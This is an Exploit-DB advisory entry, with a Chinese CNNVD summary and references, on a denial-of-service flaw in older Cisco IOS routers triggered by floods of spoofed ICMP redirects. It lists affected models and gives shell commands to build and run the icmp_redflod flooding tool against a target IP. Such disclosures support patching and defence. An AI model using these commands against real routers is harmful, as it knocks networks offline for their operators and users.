https://www.exploit-db.com/exploits/21465
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-654

CiscoIOS11.2.x和12.0.x不限制重定向表的大小。远程攻击者借助欺骗的ICMP重定向数据包到路由器导致服务拒绝（内存消耗）。

source: http://www.securityfocus.com/bid/4786/info

IOS is the Internet Operating System, used on Cisco routers. It is distributed and maintained by Cisco.

It has been reported that it is possible to cause a denial of service in some Cisco routers by sending a large amount of spoofed ICMP redirect messages.

This vulnerability has been assigned Cisco bug ID CSCdx32056.

The following products are known to be affected:

Cisco 1005 running IOS 11.0(18)
Cisco 1603 running IOS 11.3(11b)
Cisco 1603 running IOS 12.0(3)
Cisco 2503 running IOS 11.0(22a)
Cisco 2503 running IOS 11.1(24a) 

To generate random ICMP redirect messages, a sender tool is available
at http://www.phenoelit.de/irpas/icmp_redflod.c, which has to be
linked with the IRPAS packet library.

linuxbox# cd /where/irpas/is
linuxbox# make libpackets.a
linuxbox# gcc -o icmp_redflod -I. -L. icmp_redflod.c -lpackets
linuxbox# ./icmp_redflod -i eth0 -D <destination_ip> -G <fake_gateway>

On high bandwidth networks, the command line switch -w0 can be used to increase the sending rate.

来源:BID
名称:4786
链接:http://www.securityfocus.com/bid/4786
来源:XF
名称:cisco-ios-icmp-redirect-dos(9129)
链接:http://www.iss.net/security_center/static/9129.php
来源:BUGTRAQ
名称:20020521CiscoIOSICMPredirectDoS-Cisco’sresponse
链接:http://online.securityfocus.com/archive/1/273488
来源:BUGTRAQ
名称:20020521CiscoIOSICMPredirectDoS
链接:http://online.securityfocus.com/archive/1/273421